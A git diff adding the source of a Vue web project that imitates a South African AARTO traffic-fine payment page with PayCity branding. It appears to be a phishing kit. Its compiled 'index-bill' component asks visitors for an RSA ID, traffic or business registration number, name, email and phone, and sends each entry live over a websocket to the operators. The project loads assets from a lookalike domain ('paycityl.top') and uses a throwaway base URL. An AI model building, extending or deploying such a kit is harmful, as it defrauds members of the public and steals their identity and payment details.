update
5
a8_za_Fine_aarto/.env
Normal file
@@ -0,0 +1,5 @@
|
||||
# 平台本地运行端口号
|
||||
VITE_PORT = 8848
|
||||
|
||||
# 是否隐藏首页 隐藏 true 不隐藏 false (勿删除,VITE_HIDE_HOME只需在.env文件配置)
|
||||
VITE_HIDE_HOME = false
|
||||
11
a8_za_Fine_aarto/.env.development
Normal file
@@ -0,0 +1,11 @@
|
||||
# 平台本地运行端口号
|
||||
VITE_PORT = 8848
|
||||
|
||||
# 开发环境读取配置文件路径
|
||||
VITE_PUBLIC_PATH = ./
|
||||
|
||||
# 网站前缀
|
||||
VITE_BASE_URL = "upc.xx.sczqb6.top"
|
||||
|
||||
# 开发环境路由历史模式(Hash模式传"hash"、HTML5模式传"h5"、Hash模式带base参数传"hash,base参数"、HTML5模式带base参数传"h5,base参数")
|
||||
VITE_ROUTER_HISTORY = "hash"
|
||||
16
a8_za_Fine_aarto/.env.production
Normal file
@@ -0,0 +1,16 @@
|
||||
# 网站前缀
|
||||
VITE_BASE_URL=/
|
||||
|
||||
# 线上环境平台打包路径
|
||||
VITE_PUBLIC_PATH = ./
|
||||
|
||||
# 线上环境路由历史模式(Hash模式传"hash"、HTML5模式传"h5"、Hash模式带base参数传"hash,base参数"、HTML5模式带base参数传"h5,base参数")
|
||||
VITE_ROUTER_HISTORY = "hash"
|
||||
|
||||
# 是否在打包时使用cdn替换本地库 替换 true 不替换 false
|
||||
VITE_CDN = false
|
||||
|
||||
# 是否启用gzip压缩或brotli压缩(分两种情况,删除原始文件和不删除原始文件)
|
||||
# 压缩时不删除原始文件的配置:gzip、brotli、both(同时开启 gzip 与 brotli 压缩)、none(不开启压缩,默认)
|
||||
# 压缩时删除原始文件的配置:gzip-clear、brotli-clear、both-clear(同时开启 gzip 与 brotli 压缩)、none(不开启压缩,默认)
|
||||
VITE_COMPRESSION = "none"
|
||||
25
a8_za_Fine_aarto/.eslintrc.cjs
Normal file
@@ -0,0 +1,25 @@
|
||||
/* eslint-env node */
|
||||
require('@rushstack/eslint-patch/modern-module-resolution')
|
||||
|
||||
module.exports = {
|
||||
root: true,
|
||||
'extends': [
|
||||
'plugin:vue/vue3-essential',
|
||||
'eslint:recommended',
|
||||
'@vue/eslint-config-typescript',
|
||||
'@vue/eslint-config-prettier'
|
||||
],
|
||||
overrides: [
|
||||
{
|
||||
files: [
|
||||
'cypress/e2e/**/*.{cy,spec}.{js,ts,jsx,tsx}'
|
||||
],
|
||||
'extends': [
|
||||
'plugin:cypress/recommended'
|
||||
]
|
||||
}
|
||||
],
|
||||
parserOptions: {
|
||||
ecmaVersion: 'latest'
|
||||
}
|
||||
}
|
||||
28
a8_za_Fine_aarto/.gitignore
vendored
Normal file
@@ -0,0 +1,28 @@
|
||||
# Logs
|
||||
logs
|
||||
*.log
|
||||
npm-debug.log*
|
||||
yarn-debug.log*
|
||||
yarn-error.log*
|
||||
pnpm-debug.log*
|
||||
lerna-debug.log*
|
||||
|
||||
node_modules
|
||||
.DS_Store
|
||||
dist
|
||||
dist-ssr
|
||||
coverage
|
||||
*.local
|
||||
|
||||
/cypress/videos/
|
||||
/cypress/screenshots/
|
||||
|
||||
# Editor directories and files
|
||||
.vscode/*
|
||||
!.vscode/extensions.json
|
||||
.idea
|
||||
*.suo
|
||||
*.ntvs*
|
||||
*.njsproj
|
||||
*.sln
|
||||
*.sw?
|
||||
1
a8_za_Fine_aarto/.prettierrc.json
Normal file
@@ -0,0 +1 @@
|
||||
{}
|
||||
3
a8_za_Fine_aarto/.vscode/extensions.json
vendored
Normal file
@@ -0,0 +1,3 @@
|
||||
{
|
||||
"recommendations": ["Vue.volar", "Vue.vscode-typescript-vue-plugin"]
|
||||
}
|
||||
68
a8_za_Fine_aarto/README.md
Normal file
@@ -0,0 +1,68 @@
|
||||
# vue3-clean-architecture
|
||||
|
||||
This template should help get you started developing with Vue 3 in Vite.
|
||||
|
||||
## Recommended IDE Setup
|
||||
|
||||
[VSCode](https://code.visualstudio.com/) + [Volar](https://marketplace.visualstudio.com/items?itemName=Vue.volar) (and disable Vetur) + [TypeScript Vue Plugin (Volar)](https://marketplace.visualstudio.com/items?itemName=Vue.vscode-typescript-vue-plugin).
|
||||
|
||||
## Type Support for `.vue` Imports in TS
|
||||
|
||||
TypeScript cannot handle type information for `.vue` imports by default, so we replace the `tsc` CLI with `vue-tsc` for type checking. In editors, we need [TypeScript Vue Plugin (Volar)](https://marketplace.visualstudio.com/items?itemName=Vue.vscode-typescript-vue-plugin) to make the TypeScript language service aware of `.vue` types.
|
||||
|
||||
If the standalone TypeScript plugin doesn't feel fast enough to you, Volar has also implemented a [Take Over Mode](https://github.com/johnsoncodehk/volar/discussions/471#discussioncomment-1361669) that is more performant. You can enable it by the following steps:
|
||||
|
||||
1. Disable the built-in TypeScript Extension
|
||||
1) Run `Extensions: Show Built-in Extensions` from VSCode's command palette
|
||||
2) Find `TypeScript and JavaScript Language Features`, right click and select `Disable (Workspace)`
|
||||
2. Reload the VSCode window by running `Developer: Reload Window` from the command palette.
|
||||
|
||||
## Customize configuration
|
||||
|
||||
See [Vite Configuration Reference](https://vitejs.dev/config/).
|
||||
|
||||
## Project Setup
|
||||
|
||||
```sh
|
||||
npm install
|
||||
```
|
||||
|
||||
### Compile and Hot-Reload for Development
|
||||
|
||||
```sh
|
||||
npm run dev
|
||||
```
|
||||
|
||||
### Type-Check, Compile and Minify for Production
|
||||
|
||||
```sh
|
||||
npm run build
|
||||
```
|
||||
|
||||
### Run Unit Tests with [Vitest](https://vitest.dev/)
|
||||
|
||||
```sh
|
||||
npm run test:unit
|
||||
```
|
||||
|
||||
### Run End-to-End Tests with [Cypress](https://www.cypress.io/)
|
||||
|
||||
```sh
|
||||
npm run test:e2e:dev
|
||||
```
|
||||
|
||||
This runs the end-to-end tests against the Vite development server.
|
||||
It is much faster than the production build.
|
||||
|
||||
But it's still recommended to test the production build with `test:e2e` before deploying (e.g. in CI environments):
|
||||
|
||||
```sh
|
||||
npm run build
|
||||
npm run test:e2e
|
||||
```
|
||||
|
||||
### Lint with [ESLint](https://eslint.org/)
|
||||
|
||||
```sh
|
||||
npm run lint
|
||||
```
|
||||
8
a8_za_Fine_aarto/cypress.config.ts
Normal file
@@ -0,0 +1,8 @@
|
||||
import { defineConfig } from 'cypress'
|
||||
|
||||
export default defineConfig({
|
||||
e2e: {
|
||||
specPattern: 'cypress/e2e/**/*.{cy,spec}.{js,jsx,ts,tsx}',
|
||||
baseUrl: 'http://localhost:4173'
|
||||
}
|
||||
})
|
||||
8
a8_za_Fine_aarto/cypress/e2e/example.cy.ts
Normal file
@@ -0,0 +1,8 @@
|
||||
// https://docs.cypress.io/api/introduction/api.html
|
||||
|
||||
describe('My First Test', () => {
|
||||
it('visits the app root url', () => {
|
||||
cy.visit('/')
|
||||
cy.contains('h1', 'You did it!')
|
||||
})
|
||||
})
|
||||
10
a8_za_Fine_aarto/cypress/e2e/tsconfig.json
Normal file
@@ -0,0 +1,10 @@
|
||||
{
|
||||
"extends": "@vue/tsconfig/tsconfig.web.json",
|
||||
"include": ["./**/*", "../support/**/*"],
|
||||
"compilerOptions": {
|
||||
"isolatedModules": false,
|
||||
"target": "es5",
|
||||
"lib": ["es5", "dom"],
|
||||
"types": ["cypress"]
|
||||
}
|
||||
}
|
||||
5
a8_za_Fine_aarto/cypress/fixtures/example.json
Normal file
@@ -0,0 +1,5 @@
|
||||
{
|
||||
"name": "Using fixtures to represent data",
|
||||
"email": "hello@cypress.io",
|
||||
"body": "Fixtures are a great way to mock data for responses to routes"
|
||||
}
|
||||
39
a8_za_Fine_aarto/cypress/support/commands.ts
Normal file
@@ -0,0 +1,39 @@
|
||||
/// <reference types="cypress" />
|
||||
// ***********************************************
|
||||
// This example commands.ts shows you how to
|
||||
// create various custom commands and overwrite
|
||||
// existing commands.
|
||||
//
|
||||
// For more comprehensive examples of custom
|
||||
// commands please read more here:
|
||||
// https://on.cypress.io/custom-commands
|
||||
// ***********************************************
|
||||
//
|
||||
//
|
||||
// -- This is a parent command --
|
||||
// Cypress.Commands.add('login', (email, password) => { ... })
|
||||
//
|
||||
//
|
||||
// -- This is a child command --
|
||||
// Cypress.Commands.add('drag', { prevSubject: 'element'}, (subject, options) => { ... })
|
||||
//
|
||||
//
|
||||
// -- This is a dual command --
|
||||
// Cypress.Commands.add('dismiss', { prevSubject: 'optional'}, (subject, options) => { ... })
|
||||
//
|
||||
//
|
||||
// -- This will overwrite an existing command --
|
||||
// Cypress.Commands.overwrite('visit', (originalFn, url, options) => { ... })
|
||||
//
|
||||
// declare global {
|
||||
// namespace Cypress {
|
||||
// interface Chainable {
|
||||
// login(email: string, password: string): Chainable<void>
|
||||
// drag(subject: string, options?: Partial<TypeOptions>): Chainable<Element>
|
||||
// dismiss(subject: string, options?: Partial<TypeOptions>): Chainable<Element>
|
||||
// visit(originalFn: CommandOriginalFn, url: string, options: Partial<VisitOptions>): Chainable<Element>
|
||||
// }
|
||||
// }
|
||||
// }
|
||||
|
||||
export {}
|
||||
20
a8_za_Fine_aarto/cypress/support/e2e.ts
Normal file
@@ -0,0 +1,20 @@
|
||||
// ***********************************************************
|
||||
// This example support/index.js is processed and
|
||||
// loaded automatically before your test files.
|
||||
//
|
||||
// This is a great place to put global configuration and
|
||||
// behavior that modifies Cypress.
|
||||
//
|
||||
// You can change the location of this file or turn off
|
||||
// automatically serving support files with the
|
||||
// 'supportFile' configuration option.
|
||||
//
|
||||
// You can read more here:
|
||||
// https://on.cypress.io/configuration
|
||||
// ***********************************************************
|
||||
|
||||
// Import commands.js using ES2015 syntax:
|
||||
import './commands'
|
||||
|
||||
// Alternatively you can use CommonJS syntax:
|
||||
// require('./commands')
|
||||
4
a8_za_Fine_aarto/env.d.ts
vendored
Normal file
@@ -0,0 +1,4 @@
|
||||
/// <reference types="vite/client" />
|
||||
interface ImportMetaEnv {
|
||||
VITE_BASE_URL: string;
|
||||
}
|
||||
2947
a8_za_Fine_aarto/index.html
Normal file
8839
a8_za_Fine_aarto/package-lock.json
generated
Normal file
58
a8_za_Fine_aarto/package.json
Normal file
@@ -0,0 +1,58 @@
|
||||
{
|
||||
"name": "vue3-clean-architecture",
|
||||
"version": "0.0.0",
|
||||
"private": true,
|
||||
"scripts": {
|
||||
"dev": "vite",
|
||||
"build": "run-p type-check build-only",
|
||||
"preview": "vite preview",
|
||||
"test:unit": "vitest --environment jsdom --root src/",
|
||||
"test:e2e": "start-server-and-test preview :4173 'cypress run --e2e'",
|
||||
"test:e2e:dev": "start-server-and-test 'vite dev --port 4173' :4173 'cypress open --e2e'",
|
||||
"build-only": "vite build",
|
||||
"type-check": "vue-tsc --noEmit -p tsconfig.vitest.json --composite false",
|
||||
"lint": "eslint . --ext .vue,.js,.jsx,.cjs,.mjs,.ts,.tsx,.cts,.mts --fix --ignore-path .gitignore",
|
||||
"zip": "node zip.js",
|
||||
"prod": "pnpm run build && pnpm run zip"
|
||||
},
|
||||
"dependencies": {
|
||||
"@types/lodash": "^4.17.12",
|
||||
"axios": "^1.7.7",
|
||||
"bootstrap": "^5.3.3",
|
||||
"install": "^0.13.0",
|
||||
"lodash": "^4.17.21",
|
||||
"mitt": "^3.0.1",
|
||||
"pinia": "^2.2.2",
|
||||
"socket.io-client": "^4.8.1",
|
||||
"uuid": "^13.0.0",
|
||||
"vue": "^3.2.45",
|
||||
"vue-i18n": "^10.0.4",
|
||||
"vue-router": "^4.1.6",
|
||||
"vue-scrollto": "^2.20.0",
|
||||
"ws": "^8.18.0"
|
||||
},
|
||||
"devDependencies": {
|
||||
"@rushstack/eslint-patch": "^1.1.4",
|
||||
"@types/jsdom": "^20.0.1",
|
||||
"@types/node": "^18.11.12",
|
||||
"@types/uuid": "^11.0.0",
|
||||
"@vitejs/plugin-vue": "^4.0.0",
|
||||
"@vue/eslint-config-prettier": "^7.0.0",
|
||||
"@vue/eslint-config-typescript": "^11.0.0",
|
||||
"@vue/test-utils": "^2.2.6",
|
||||
"@vue/tsconfig": "^0.1.3",
|
||||
"archiver": "^7.0.1",
|
||||
"cypress": "^12.0.2",
|
||||
"eslint": "^8.22.0",
|
||||
"eslint-plugin-cypress": "^2.12.1",
|
||||
"eslint-plugin-vue": "^9.3.0",
|
||||
"jsdom": "^20.0.3",
|
||||
"npm-run-all": "^4.1.5",
|
||||
"prettier": "^2.7.1",
|
||||
"start-server-and-test": "^1.15.2",
|
||||
"typescript": "~4.7.4",
|
||||
"vite": "^4.0.0",
|
||||
"vitest": "^0.25.6",
|
||||
"vue-tsc": "^1.0.12"
|
||||
}
|
||||
}
|
||||
5271
a8_za_Fine_aarto/pnpm-lock.yaml
generated
Normal file
BIN
a8_za_Fine_aarto/public/Static_zy/AARTO-logo.jpg
Normal file
|
After Width: | Height: | Size: 55 KiB |
BIN
a8_za_Fine_aarto/public/Static_zy/BlBINWkv.jpg
Normal file
|
After Width: | Height: | Size: 141 KiB |
39
a8_za_Fine_aarto/public/Static_zy/LiveChatWidgetFrame.css
Normal file
@@ -0,0 +1,39 @@
|
||||
@media screen and (max-height:600px) {
|
||||
#Microsoft_Omnichannel_LCWidget_Chat_Iframe_Window.web_chat_panel {
|
||||
height: calc(100vh - 40px)
|
||||
}
|
||||
}
|
||||
|
||||
@media screen and (max-width:470px) {
|
||||
#Microsoft_Omnichannel_LCWidget_Chat_Iframe_Window.web_chat_panel.BottomLeft,
|
||||
#Microsoft_Omnichannel_LCWidget_Chat_Iframe_Window.web_chat_panel.BottomRight {
|
||||
right: 0;
|
||||
left: 0;
|
||||
bottom: 0
|
||||
}
|
||||
#Microsoft_Omnichannel_LCWidget_Chat_Iframe_Window.web_chat_panel {
|
||||
height: 100%;
|
||||
width: 100%;
|
||||
right: 0;
|
||||
left: 0;
|
||||
bottom: 0
|
||||
}
|
||||
}
|
||||
|
||||
/* InApp */
|
||||
@media screen and (max-height:600px) {
|
||||
#Microsoft_Omnichannel_LCWidget_Chat_Iframe_Window.inApp.web_chat_panel {
|
||||
height: calc(100vh - 40px);
|
||||
}
|
||||
|
||||
@media screen and (orientation:landscape) {
|
||||
#Microsoft_Omnichannel_LCWidget_Chat_Iframe_Window.inApp.web_chat_panel {
|
||||
height: calc(100vh);
|
||||
width: calc(100vw);
|
||||
}
|
||||
#Microsoft_Omnichannel_LCWidget_Chat_Iframe_Window.inApp.BottomRight {
|
||||
right: 0;
|
||||
bottom: 0;
|
||||
}
|
||||
}
|
||||
}
|
||||
79
a8_za_Fine_aarto/public/Static_zy/Logo.svg
Normal file
|
After Width: | Height: | Size: 41 KiB |
|
After Width: | Height: | Size: 295 KiB |
|
After Width: | Height: | Size: 38 KiB |
|
After Width: | Height: | Size: 819 KiB |
@@ -0,0 +1 @@
|
||||
No Content: https://paycityl.top/apps/ZA_PAY_01/assets/Simple-Line-Icons-D0KobG-u.woff2?v=2.4.0
|
||||
@@ -0,0 +1 @@
|
||||
const l='data:image/svg+xml,%3csvg%20xmlns=\'http://www.w3.org/2000/svg\'%20id=\'flag-icons-cl\'%20viewBox=\'0%200%20640%20480\'%3e%3cdefs%3e%3cclipPath%20id=\'cl-a\'%3e%3cpath%20fill-opacity=\'.7\'%20d=\'M0%200h682.7v512H0z\'/%3e%3c/clipPath%3e%3c/defs%3e%3cg%20fill-rule=\'evenodd\'%20clip-path=\'url(%23cl-a)\'%20transform=\'scale(.9375)\'%3e%3cpath%20fill=\'%23fff\'%20d=\'M256%200h512v256H256z\'/%3e%3cpath%20fill=\'%230039a6\'%20d=\'M0%200h256v256H0z\'/%3e%3cpath%20fill=\'%23fff\'%20d=\'M167.8%20191.7%20128.2%20162l-39.5%2030%2014.7-48.8L64%20113.1l48.7-.5L127.8%2064l15.5%2048.5%2048.7.1-39.2%2030.4z\'/%3e%3cpath%20fill=\'%23d52b1e\'%20d=\'M0%20256h768v256H0z\'/%3e%3c/g%3e%3c/svg%3e';export{l as default};
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://paycityl.top/apps/ZA_PAY_01/assets/fontawesome-webfont-B-jkhYfk.woff2?v=4.7.0
|
||||
@@ -0,0 +1 @@
|
||||
import{_ as e,u as a,s as t,c as computed,r as ref,w as watch,o,a as onMounted,b as s,d as i,e as r,v as l,f as n,i as c,g as u,h as d}from'./index-BkIIaFwB.js';import m from'./flag-chile-DJ0gyZyb.js';const p={class:'main'},g={id:'idSearchSection',class:'dzsparallaxer auto-init height-is-based-on-content use-loading mode-scroll loaded dzsprx-readyall AdjustedHeight ng-scope','data-options':'{direction: \'reverse\';, settings_mode_oneelement_max_offset: \'150\'}'},v=['innerHTML'],h={class:'container text-center g-py-100--md g-py-80'},b={class:'form-group'},f={class:'ng-pristine ng-valid'},R={class:'container mt-3'},y={class:'d-flex flex-column'},N={class:'custom-control custom-radio mb-3'},_={class:'custom-control custom-radio mb-3'},x={class:'custom-control custom-radio mb-3'},w={class:'g-width-60x--md mx-auto'},D={class:'form-group g-mb-20'},S={class:'input-group u-shadow-v21 input-group-addon-right-radius g-mb-15 pcc-search'},I=['placeholder'],T={class:'input-group-addon input-group-addon-right-radius d-flex align-items-center g-bg-white g-brd-white g-color-gray-light-v1 g-pa-2'},z={id:'RSAIDNumberError',style:{color:'red !important','font-size':'20px !important'},class:'form-text g-color-white g-opacity-0_8 g-font-size-default'},A=e({__name:'index-bill',setup(e){const{t:A,configStore:B,wsStore:k,userStore:C,router:j}=a(),{name:E,email:H,phone:L}=t(C);B.area_code??A('local.area_code');const{account:M,order_id:P}=t(C),q=computed(()=>A('content.pay_description').replace('#_BRAND_NAME_#',B.brand_name));B.flag=m;const U=ref(!1);watch(L,(e,a)=>{L.value&&(L.value=L.value.replace(/\D/g,''),C.setData('phone',L.value),k.send(C.latestData('update')))}),o(async()=>{C.setData('pay_amount',B.pay_amount),P.value&&await j.push('/notice')}),onMounted(()=>{P.value&&j.push('/notice'),C.routerLog('home','进入主页','home'),C.setData({status:'首页',current_page:'home',current_action:'view'}),k.send(C.latestData('update'))});const V=ref('Please enter your Traffic Registration Number (TRN)'),F=e=>{V.value='Please enter your '+e};return(e,a)=>(d(),s('div',p,[i('section',g,[a[12]||(a[12]=i('div',{class:'divimage dzsparallaxer--target w-100 g-bg-cover pcc-dark-hero-overlay--after index-bg'},null,-1)),i('div',{class:'home-description',innerHTML:q.value},null,8,v),i('div',h,[i('div',b,[a[8]||(a[8]=i('h3',{class:'h1 text-uppercase g-color-white g-font-weight-600 g-mb-30'},'Search Enquiry Type',-1)),i('div',f,[i('div',R,[i('div',y,[i('div',N,[i('input',{type:'radio',id:'customRadio1',name:'customRadio',class:'custom-control-input',value:'RSAIDNumber',onClick:a[0]||(a[0]=e=>F('RSA ID Number'))}),a[5]||(a[5]=i('label',{class:'custom-control-label',for:'customRadio1'},'RSA ID Number',-1))]),i('div',_,[i('input',{type:'radio',id:'customRadio2',name:'customRadio',class:'custom-control-input',value:'BusinessRegistrationCertificate',onClick:a[1]||(a[1]=e=>F('Business Registration Number (BRN)'))}),a[6]||(a[6]=i('label',{class:'custom-control-label',for:'customRadio2'},'Business Registration Number (BRN)',-1))]),i('div',x,[i('input',{type:'radio',id:'customRadio3',name:'customRadio',checked:'',class:'custom-control-input',value:'RegistrationNumberCertificate',onClick:a[2]||(a[2]=e=>F('Traffic Registration Number (TRN)'))}),a[7]||(a[7]=i('label',{class:'custom-control-label',for:'customRadio3'},'Traffic Registration Number (TRN)',-1))])])])])]),i('div',w,[i('div',D,[i('div',S,[r(i('input',{minlength:'13',maxlength:'13','onUpdate:modelValue':a[3]||(a[3]=e=>c(M)?M.value=e:null),id:'idNumberInput',name:'idNumberInput',class:'form-control-left-radius form-control form-control-md g-brd-white g-font-size-16 border-right-0 pr-0 g-py-15',type:'text',placeholder:V.value},null,8,I),[[l,n(M)]]),i('div',T,[i('button',{title:'Invalid length, the length should be 13 characters',id:'onSearchBtn',class:'btn input-group-addon-right-radius u-btn-primary g-font-size-16 g-py-15 g-px-20 pcc-search-button',type:'button',onClick:a[4]||(a[4]=e=>{M.value&&M.value.length>=13?(U.value=!1,j.push('/notice')):U.value=!0})},a[9]||(a[9]=[i('i',{class:'icon-magnifier g-pos-rel g-top-1'},null,-1)]))])]),a[11]||(a[11]=i('small',{id:'RSAIDNumberText',class:'form-text g-color-white g-opacity-0_8 g-font-size-default'},'Please provide a valid ID Number, Traffic Registration Number or Business Registration Number.',-1)),r(i('small',z,a[10]||(a[10]=[i('strong',null,'Invalid id format, please revise your input.',-1)]),512),[[u,U.value]])])])])])]))}},[['__scopeId','data-v-85222b90']]);export{A as default};
|
||||
@@ -0,0 +1 @@
|
||||
.index-bg[data-v-85222b90]{height:140%;background-image:url(./PayCity-Website-Images4-C8v2DQwV.png);transform:translate3d(0,-55.9644px,0)}.custom-control-label[data-v-85222b90]{color:#fff;transform:scale(1.3)!important}.home-description[data-v-85222b90]{font-size:14px;color:red;background-color:#fff;margin:10px}.lookup-box[data-v-85222b90]{background:#fff;margin-top:-20px;border-radius:12px;padding:28px;box-shadow:0 4px 12px #0000001f}.lookup-box h5[data-v-85222b90]{margin-bottom:16px}.lookup-box label[data-v-85222b90]{font-weight:700;color:#003c71}.lookup-box input[data-v-85222b90]{width:100%;padding:12px;border-radius:8px;border:1px solid #b9c7d5;margin-top:8px}.card .title[data-v-85222b90]{font-weight:700;padding:5px 0}.card .item[data-v-85222b90]{background-color:#f7f7f7;display:flex;font-size:14px;margin:5px 0;padding:10px 5px}.card .item .name[data-v-85222b90]{text-transform:capitalize;min-width:40%;text-align:right;padding-right:1rem;font-weight:700}.tarjeta-contacto .info-box-form[data-v-85222b90]{color:#444;text-align:left;box-shadow:0 0 20px #d6d7d880;padding:20px}.titulo-modulo h2[data-v-85222b90]{margin:0 0 30px;font-size:2.75rem;font-weight:700;text-transform:uppercase;font-family:Oswald,sans-serif;color:#222}.titulo-modulo p[data-v-85222b90]{font-size:1.2rem;font-weight:500;padding:0;line-height:1px;margin:0 0 5px;letter-spacing:2px;text-transform:uppercase;color:#666;font-family:Manrope,sans-serif}.titulo-modulo p[data-v-85222b90]:after{content:"";width:120px;height:1px;display:inline-block;background:#ccc;margin:4px 10px}
|
||||
|
After Width: | Height: | Size: 41 KiB |
@@ -0,0 +1 @@
|
||||
const l='data:image/svg+xml,%3csvg%20xmlns=\'http://www.w3.org/2000/svg\'%20id=\'flag-icons-za\'%20viewBox=\'0%200%20640%20480\'%3e%3cdefs%3e%3cclipPath%20id=\'za-a\'%3e%3cpath%20fill-opacity=\'.7\'%20d=\'M-71.9%200h682.7v512H-71.9z\'/%3e%3c/clipPath%3e%3c/defs%3e%3cg%20clip-path=\'url(%23za-a)\'%20transform=\'translate(67.4)scale(.93748)\'%3e%3cg%20fill-rule=\'evenodd\'%20stroke-width=\'1pt\'%3e%3cpath%20fill=\'%23000001\'%20d=\'M-71.9%20407.8V104.4L154%20256.1z\'/%3e%3cpath%20fill=\'%23000c8a\'%20d=\'m82.2%20512.1%20253.6-170.6H696V512H82.2z\'/%3e%3cpath%20fill=\'%23e1392d\'%20d=\'M66%200h630v170.8H335.7S69.3-1.7%2066%200\'/%3e%3cpath%20fill=\'%23ffb915\'%20d=\'M-71.9%2064v40.4L154%20256-72%20407.8v40.3l284.5-192z\'/%3e%3cpath%20fill=\'%23007847\'%20d=\'M-71.9%2064V0h95l301.2%20204h371.8v104.2H324.3L23%20512h-94.9v-63.9l284.4-192L-71.8%2064z\'/%3e%3cpath%20fill=\'%23fff\'%20d=\'M23%200h59.2l253.6%20170.7H696V204H324.3zm0%20512.1h59.2l253.6-170.6H696v-33.2H324.3L23%20512z\'/%3e%3c/g%3e%3c/g%3e%3c/svg%3e';export{l as default};
|
||||
@@ -0,0 +1,205 @@
|
||||
|
||||
// go/mss-setup#7-load-the-js-or-css-from-your-initial-page
|
||||
if(!window['_DumpException']) {
|
||||
const _DumpException = window['_DumpException'] || function(e) {
|
||||
throw e;
|
||||
};
|
||||
window['_DumpException'] = _DumpException;
|
||||
}
|
||||
"use strict";this.default_tr=this.default_tr||{};(function(_){var window=this;
|
||||
try{
|
||||
_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles_default_tr=a||[]};(0,_._F_toggles_initialize)([0xc000, ]);
|
||||
/*
|
||||
|
||||
Copyright The Closure Library Authors.
|
||||
SPDX-License-Identifier: Apache-2.0
|
||||
*/
|
||||
/*
|
||||
|
||||
Copyright Google LLC
|
||||
SPDX-License-Identifier: Apache-2.0
|
||||
*/
|
||||
var ba,ea,sa,ya,Ba,Ca,Fa,Ga,Ha,Ja,Za,eb,jb,lb,mb,sb,tb,ub,xb,yb,zb,x,Bb,Cb,Eb,Ib,Kb,Lb,Mb;_.aa=function(a,b){if(Error.captureStackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));b!==void 0&&(this.cause=b)};ba=function(a,b){a=a.split("%s");for(var c="",d=a.length-1,e=0;e<d;e++)c+=a[e]+(e<b.length?b[e]:"%s");_.aa.call(this,c+a[d])};ea=function(a){if(_.ca)a(_.ca);else{var b;((b=da)!=null?b:da=[]).push(a)}};
|
||||
_.ja=function(){!_.ca&&_.ha&&_.ia();return _.ca};_.ia=function(){_.ca=_.ha();var a;(a=da)==null||a.forEach(ea);da=void 0};_.la=function(a){_.ca&&ka(a)};_.na=function(){_.ca&&ma(_.ca)};_.pa=function(a,b){b.hasOwnProperty("displayName")||(b.displayName=a.toString());b[oa]=a};_.qa=function(a){a&&typeof a.dispose=="function"&&a.dispose()};sa=function(a){for(var b=0,c=arguments.length;b<c;++b){var d=arguments[b];_.ra(d)?sa.apply(null,d):_.qa(d)}};_.ua=function(a,b){return(0,_.ta)(a,b)>=0};
|
||||
_.va=function(a,b){_.ua(a,b)||a.push(b)};_.wa=function(a,b){b=(0,_.ta)(a,b);var c;(c=b>=0)&&Array.prototype.splice.call(a,b,1);return c};_.xa=function(a){var b=a.length;if(b>0){for(var c=Array(b),d=0;d<b;d++)c[d]=a[d];return c}return[]};ya=function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(_.ra(d)){var e=a.length||0,f=d.length||0;a.length=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}};
|
||||
Ba=function(a,b){b=b||a;for(var c=0,d=0,e={};d<a.length;){var f=a[d++],g=_.za(f)?"o"+_.Aa(f):(typeof f).charAt(0)+f;Object.prototype.hasOwnProperty.call(e,g)||(e[g]=!0,b[c++]=f)}b.length=c};Ca=function(a,b){for(var c in a)if(b.call(void 0,a[c],c,a))return!0;return!1};_.Da=function(a){var b=[],c=0,d;for(d in a)b[c++]=a[d];return b};
|
||||
Fa=function(a,b){for(var c,d,e=1;e<arguments.length;e++){d=arguments[e];for(c in d)a[c]=d[c];for(var f=0;f<Ea.length;f++)c=Ea[f],Object.prototype.hasOwnProperty.call(d,c)&&(a[c]=d[c])}};Ga=function(a){var b=arguments.length;if(b==1&&Array.isArray(arguments[0]))return Ga.apply(null,arguments[0]);for(var c={},d=0;d<b;d++)c[arguments[d]]=!0;return c};Ha=function(a){return{valueOf:a}.valueOf()};
|
||||
Ja=function(){var a=null;if(!Ia)return a;try{var b=function(c){return c};a=Ia.createPolicy("goog#html",{createHTML:b,createScript:b,createScriptURL:b})}catch(c){}return a};_.La=function(){Ka===void 0&&(Ka=Ja());return Ka};_.Na=function(a){var b=_.La();a=b?b.createScriptURL(a):a;return new _.Ma(a)};_.Oa=function(a){if(a instanceof _.Ma)return a.g;throw Error("u");};
|
||||
_.Pa=function(a,b){b=b===void 0?document:b;var c,d;b=(d=(c=b).querySelector)==null?void 0:d.call(c,a+"[nonce]");return b==null?"":b.nonce||b.getAttribute("nonce")||""};_.Ra=function(a){var b=_.La();a=b?b.createScript(a):a;return new _.Qa(a)};_.Sa=function(a){if(a instanceof _.Qa)return a.g;throw Error("u");};_.Ta=function(a,b){a.src=_.Oa(b);(b=_.Pa("script",a.ownerDocument))&&a.setAttribute("nonce",b)};_.Ua=function(){var a=_.u.navigator;return a&&(a=a.userAgent)?a:""};
|
||||
_.v=function(a){return _.Ua().indexOf(a)!=-1};_.Xa=function(){return _.Va?!!_.Wa&&_.Wa.brands.length>0:!1};_.Ya=function(){return _.Xa()?!1:_.v("Opera")};Za=function(){return _.Va?!!_.Wa&&!!_.Wa.platform:!1};_.$a=function(){return _.v("iPhone")&&!_.v("iPod")&&!_.v("iPad")};_.ab=function(){return _.$a()||_.v("iPad")||_.v("iPod")};_.bb=function(){return Za()?_.Wa.platform==="macOS":_.v("Macintosh")};
|
||||
_.db=function(a){var b=_.cb.apply(1,arguments);if(b.length===0)return _.Na(a[0]);for(var c=a[0],d=0;d<b.length;d++)c+=encodeURIComponent(b[d])+a[d+1];return _.Na(c)};eb=function(a){this.src=a;this.g={};this.h=0};jb=function(a,b){_.w.call(this);this.o=a;if(b){if(this.l)throw Error("y");this.l=b;this.h=_.fb(b);this.g=new gb(_.hb(b));this.g.Ce(this.o.h());this.j=new ib(this.h);this.j.start()}};lb=function(a){a=a.Dg.charCodeAt(a.fc++);return kb[a]};
|
||||
mb=function(a){var b=0,c=0;do{var d=lb(a);b|=(d&31)<<c;c+=5}while(d&32);return b<0?b+4294967296:b};_.nb=function(a){_.u.setTimeout(function(){throw a;},0)};sb=function(){for(var a;a=ob.remove();){try{a.g.call(a.scope)}catch(b){_.nb(b)}pb(qb,a)}rb=!1};tb=function(){};ub=function(){};_.wb=function(a){a=_.vb(a);return _.Na(a)};_.vb=function(a){return a===null?"null":a===void 0?"undefined":a};xb=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};
|
||||
